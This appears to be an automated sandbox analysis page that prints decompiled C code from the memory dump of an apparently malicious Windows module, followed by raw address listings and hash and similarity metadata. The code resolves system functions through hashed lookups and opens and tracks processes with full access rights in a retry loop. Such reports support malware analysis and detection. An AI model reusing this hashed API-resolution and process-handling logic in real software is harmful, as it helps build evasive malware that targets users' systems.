						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6F32F4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6F333064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6F32F4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6F32F828( *((intOrPtr*)(_t439 + 8)), E6F32F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6F32F4BC( *((intOrPtr*)(_t439 + 8)), E6F32F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6F32F4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6F32F828( *((intOrPtr*)(_t439 + 4)), E6F32F4CC( *_t439) + 4);
										 *(E6F32F4BC( *((intOrPtr*)(_t439 + 4)), E6F32F4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6F32F4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6F32F4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6F32F4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6F32F4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6F32F4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6F32F4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6F3338F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6F32F4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6F32F828( *((intOrPtr*)(_t439 + 4)), E6F32F4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6F333064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6F32F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6F32F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6F32F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6F32F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6F32F4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6F3338F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6F32F4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6F32F828( *((intOrPtr*)(_t439 + 8)), E6F32F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6F32F4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6f32a4f2
0x6f32a4f4
0x6f32a4ff
0x6f32a505
0x6f32a509
0x6f32a50e
0x6f32a514
0x6f32a524
0x00000000
0x6f32a526
0x6f32a526
0x6f32a531
0x6f32a531
0x6f32aaaf
0x6f32aab1
0x6f32aab2
0x6f32aaf1
0x6f32aaf5
0x6f32ab03
0x6f32ab11
0x6f32ab11
0x6f32aafc
0x6f32ab17
0x6f32ab1c
0x00000000
0x6f32ab1c
0x6f32ab00
0x6f32ab01
0x00000000
0x6f32a53b
0x6f32a53b
0x6f32a53f
0x6f32a646
0x6f32a646
0x6f32a64b
0x6f32a75c
0x6f32a760
0x6f32a765
0x6f32a769
0x6f32a893
0x6f32a895
0x6f32a899
0x6f32a8a2
0x6f32a8ab
0x6f32a8af
0x6f32a8b8
0x6f32a8bf
0x6f32a8c0
0x6f32a8c4
0x6f32a8c8
0x6f32a8cc
0x6f32a8ce
0x6f32aa38
0x6f32aa38
0x6f32aa40
0x6f32aa58
0x6f32aa5a
0x6f32aa5c
0x6f32aa96
0x6f32aa96
0x6f32aa98
0x6f32aa98
0x6f32aa9b
0x6f32aab6
0x6f32aaca
0x6f32aacd
0x6f32aad2
0x6f32aadd
0x6f32aade
0x6f32aae1
0x6f32aae3
0x6f32aaec
0x00000000
0x6f32aaec
0x6f32aa9d
0x6f32aaa1
0x6f32aaaa
0x00000000
0x6f32aaaa
0x6f32aa6d
0x6f32aa7d
0x6f32aa81
0x6f32aa81
0x6f32aa84
0x6f32aa87
0x6f32aa8a
0x6f32aa90
0x00000000
0x00000000
0x00000000
0x6f32aa92
0x6f32a8d6
0x6f32a8d6
0x6f32a8d8
0x6f32a8dc
0x6f32a8e1
0x6f32a8e3
0x6f32a8e7
0x6f32a8ea
0x6f32a8f2
0x6f32a8f4
0x00000000
0x00000000
0x6f32a90b
0x6f32a926
0x6f32a928
0x6f32a93b
0x6f32a93d
0x6f32a93f
0x6f32a95a
0x6f32a95a
0x6f32a95e
0x6f32a960
0x00000000
0x00000000
0x6f32a962
0x6f32a965
0x6f32a986
0x6f32a9a5
0x6f32a9ab
0x6f32a9ae
0x6f32a9b3
0x6f32a9b4
0x6f32a9b8
0x00000000
0x00000000
0x6f32a9c0
0x6f32a9c0
0x6f32a9c2
0x6f32a9ce
0x6f32a9da
0x6f32a9e4
0x6f32a9e7
0x6f32a9ea
0x6f32a9ee
0x6f32a9f5
0x6f32a9f9
0x6f32a9fd
0x6f32a9fe
0x6f32aa02
0x6f32aa07
0x6f32aa0c
0x6f32aa10
0x6f32aa14
0x6f32aa1a
0x6f32aa20
0x6f32aa26
0x6f32aa2c
0x6f32aa31
0x6f32aa32
0x6f32aa32
0x00000000
0x6f32a9c2
0x00000000
0x6f32a965
0x6f32a943
0x6f32a954
0x6f32a956
0x6f32a958
0x00000000
0x00000000
0x00000000
0x6f32a958
0x6f32a96b
0x00000000
0x6f32a96b
0x6f32a76f
0x6f32a772
0x6f32a774
0x00000000
0x00000000
0x6f32a77c
0x6f32a77c
0x6f32a77e
0x6f32a77e
0x6f32a78f
0x6f32a791
0x6f32a794
0x00000000
0x00000000
0x6f32a88a
0x6f32a88b
0x6f32a88d
0x00000000
0x00000000
0x00000000
0x6f32a88d
0x6f32a79a
0x6f32a79d
0x6f32a7a7
0x6f32a7ac
0x6f32a7ae
0x6f32a7b4
0x6f32a7bb
0x6f32a7bf
0x6f32a7c4
0x6f32a7c8
0x6f32ac03
0x6f32ac17
0x6f32ac3a
0x6f32ac3f
0x6f32ac3f
0x6f32a7df
0x6f32a7e4
0x6f32a7e4
0x6f32a7e4
0x6f32a7e4
0x6f32a7ea
0x6f32a7ef
0x6f32a7f1
0x6f32a7f6
0x6f32a7fd
0x6f32a802
0x6f32a804
0x6f32abc1
0x6f32abd2
0x6f32abec
0x6f32abf1
0x6f32abf1
0x6f32a81a
0x6f32a81f
0x6f32a81f
0x6f32a81f
0x6f32a81f
0x6f32a833
0x6f32a851
0x6f32a856
0x6f32a866
0x6f32a883
0x6f32a885
0x6f32a885
0x00000000
0x6f32a79d
0x6f32a653
0x6f32a653
0x6f32a655
0x6f32a65c
0x6f32a66a
0x6f32a66c
0x6f32a66f
0x6f32a676
0x6f32a678
0x6f32a6a9
0x6f32a6b8
0x6f32a6ba
0x6f32a6bc
0x6f32a6da
0x6f32a6dc
0x6f32a6de
0x6f32a6f1
0x6f32a710
0x6f32a716
0x6f32a719
0x6f32a730
0x6f32a74c
0x6f32a74e
0x6f32a74e
0x6f32a74e
0x6f32a74e
0x6f32a6de
0x00000000
0x6f32a6bc
0x6f32a67c
0x6f32a67c
0x6f32a67e
0x6f32a68f
0x6f32a691
0x6f32a693
0x00000000
0x00000000
0x6f32a69f
0x6f32a6a0
0x6f32a6a7
0x00000000
0x00000000
0x00000000
0x6f32a6a7
0x6f32a695
0x6f32a698
0x00000000
0x00000000
0x6f32a751
0x6f32a751
0x6f32a752
0x6f32a752
0x00000000
0x6f32a545
0x6f32a547
0x6f32a547
0x6f32a549
0x6f32a550
0x6f32a55e
0x6f32a560
0x6f32a564
0x6f32a568
0x6f32a56a
0x6f32a598
0x6f32a59b
0x6f32a5a0
0x6f32a5a4
0x6f32a5a9
0x6f32a5b0
0x6f32a5b5
0x6f32a5b7
0x6f32ab7e
0x6f32ab8f
0x6f32abaf
0x6f32abb4
0x6f32abb4
0x6f32a5cd
0x6f32a5d2
0x6f32a5d2
0x6f32a5d2
0x6f32a5d2
0x6f32a5e4
0x6f32a5e6
0x6f32a5e8
0x6f32a5f9
0x6f32a5f9
0x6f32a5ff
0x6f32a604
0x6f32a608
0x6f32a60e
0x6f32a615
0x6f32a61a
0x6f32a61c
0x6f32ab32
0x6f32ab43
0x6f32ab64
0x6f32ab69
0x6f32ab69
0x6f32a633
0x6f32a638
0x6f32a638
0x6f32a638
0x6f32a638
0x6f32a63b
0x6f32a63b
0x00000000
0x6f32a63b
0x6f32a56e
0x6f32a56e
0x6f32a570
0x6f32a581
0x6f32a583
0x6f32a585
0x00000000
0x00000000
0x6f32a591
0x6f32a592
0x6f32a596
0x00000000
0x00000000
0x00000000
0x6f32a596
0x6f32a587
0x6f32a58a
0x00000000
0x00000000
0x6f32a63c
0x6f32a63c
0x6f32a63d
0x6f32a63d
0x00000000
0x6f32a549
0x6f32a53f

Strings

, xrefs: 6F32AAF7

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c10bd74e6bafd30699a1bdff969fbe78cca6b0a635a3bbb8da7af16e3b601120
Instruction ID: e0119b168cfa05b244ad757a82b2033f56a2211e28f52bfe235d134d4875b04d
Opcode Fuzzy Hash: c10bd74e6bafd30699a1bdff969fbe78cca6b0a635a3bbb8da7af16e3b601120
Instruction Fuzzy Hash: 89126C726083419FCB14DF34C980A6EB7E5EF85714F108A2DE9D9972A1EB70ED05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F328428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6F328428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6F32B658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6F32F4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6F32F654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6F332234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6F32F654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6F32F584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6F32F584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6F32F4BC(_t449 + 0x14, 0);
									_t180 = E6F332908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6F32B5C4(_t449 + 0x34);
										E6F32B5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6F32F4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6F32F4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6F32B5C4(_t449 + 0x34);
										E6F32B5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6F32CA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6F32C280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6F32F828(_t449 + 0x14, E6F32F4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6F32F4BC(_t449 + 0x14, E6F32F4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6F333064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6F32F828(_t449 + 0x40, E6F32F4CC(_t449 + 0x3c) + 4);
											 *(E6F32F4BC(_t449 + 0x40, E6F32F4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6F32CD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6F32F4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6F32F4BC(_t449 + 0x40, _t431 * 4);
												E6F328B58( *_t211, E6F3302B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6F32CD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6F32F4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6F32F4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6F32F4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6F32F4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6F32F4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6F3338F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6F32F4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6F32F828( *(_t449 + 4), E6F32F4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6F32F4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6F32F4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6F32F4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6F32F4BC(_t322, _t430);
										E6F3338F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6F32F4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6F32F828(_t322, E6F32F4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6F32F828( *(_t449 + 4), E6F32F4CC( *_t449) + 4);
								 *(E6F32F4BC( *(_t449 + 4), E6F32F4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6F32F828(_t322, E6F32F4CC(_t322) + 4);
								 *(E6F32F4BC(_t322, E6F32F4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6F32F4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6F333064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6F32F4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6F32F828( *(_t449 + 4), E6F32F4CC( *_t449) + 4);
										 *(E6F32F4BC( *(_t449 + 4), E6F32F4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6F32F4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6F32F828( *((intOrPtr*)(_t449 + 0x74)), E6F32F4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6F32F4BC( *((intOrPtr*)(_t449 + 0x74)), E6F32F4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6F32F4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6F32F4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6F32F4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6F32F4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6F32F4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6F32F4BC(_t430, _t443);
										E6F3338F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6F32F4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6F32F828(_t430, E6F32F4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6F333064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6F32F4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6F32F4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6F32F4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6F32F4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6F32F4BC( *(_t449 + 4), _t445);
										E6F3338F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6F32F4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6F32F828( *(_t449 + 4), E6F32F4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6F32F4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6f328435
0x6f32843b
0x6f32843f
0x6f328443
0x6f32844e
0x6f328452
0x6f328457
0x6f32845f
0x6f32846f
0x00000000
0x6f328471
0x6f328479
0x6f328480
0x6f328480
0x6f3289d3
0x6f3289d5
0x6f328a16
0x6f328a18
0x6f328a27
0x6f328a33
0x6f328a33
0x6f328a22
0x6f328a39
0x6f328a3e
0x00000000
0x6f328a3e
0x6f328a26
0x00000000
0x6f32848a
0x6f32848e
0x6f328491
0x6f328599
0x6f328599
0x6f32859e
0x6f3286c1
0x6f3286c5
0x6f3286ca
0x6f3286ce
0x6f3286d2
0x6f328808
0x6f32880a
0x6f32880e
0x6f328817
0x6f328822
0x6f328826
0x6f32882f
0x6f328834
0x6f32883a
0x6f32883b
0x6f32883f
0x6f328843
0x6f32884a
0x6f32884c
0x6f32898c
0x6f32899d
0x6f3289a4
0x6f3289ab
0x6f3289ab
0x6f3289ae
0x6f3289b1
0x6f3289b4
0x6f3289ba
0x6f3289c1
0x6f3289c5
0x6f3289ce
0x00000000
0x6f3289ce
0x6f3289bc
0x6f3289bf
0x6f3289d8
0x6f3289f0
0x6f3289f3
0x6f3289f8
0x6f328a02
0x6f328a05
0x6f328a08
0x6f328a11
0x00000000
0x6f328a11
0x00000000
0x6f3289bf
0x6f328854
0x6f328854
0x6f328856
0x6f32885a
0x6f32885f
0x6f328861
0x6f328865
0x6f328868
0x6f328870
0x6f328872
0x00000000
0x00000000
0x6f328889
0x6f3288a4
0x6f3288a6
0x6f3288b4
0x6f3288b9
0x6f3288bb
0x6f3288d8
0x6f3288d8
0x6f3288dc
0x6f3288de
0x00000000
0x00000000
0x6f3288e0
0x6f3288e3
0x6f328904
0x6f328923
0x6f328929
0x6f32892c
0x6f328931
0x6f328932
0x6f328939
0x00000000
0x00000000
0x6f328941
0x6f328941
0x6f328943
0x6f32894f
0x6f32895b
0x6f32897d
0x6f328982
0x6f328983
0x6f328983
0x00000000
0x6f328943
0x00000000
0x6f3288e3
0x6f3288bd
0x6f3288c3
0x6f3288c5
0x6f3288c6
0x6f3288c7
0x6f3288c8
0x6f3288cc
0x6f3288d0
0x6f3288d2
0x6f3288d3
0x6f3288d4
0x6f3288d6
0x00000000
0x00000000
0x00000000
0x6f3288d6
0x6f3288e9
0x00000000
0x6f3288e9
0x6f3286d8
0x6f3286da
0x6f3286dc
0x00000000
0x00000000
0x6f3286e6
0x6f3286e6
0x6f3286e8
0x6f3286eb
0x6f3286ed
0x6f3286f5
0x6f3286fc
0x6f328700
0x6f328703
0x00000000
0x00000000
0x6f3287ff
0x6f328800
0x6f328802
0x00000000
0x00000000
0x00000000
0x6f328802
0x6f328709
0x6f32870c
0x6f328715
0x6f32871a
0x6f32871c
0x6f328728
0x6f32872c
0x6f328731
0x6f328735
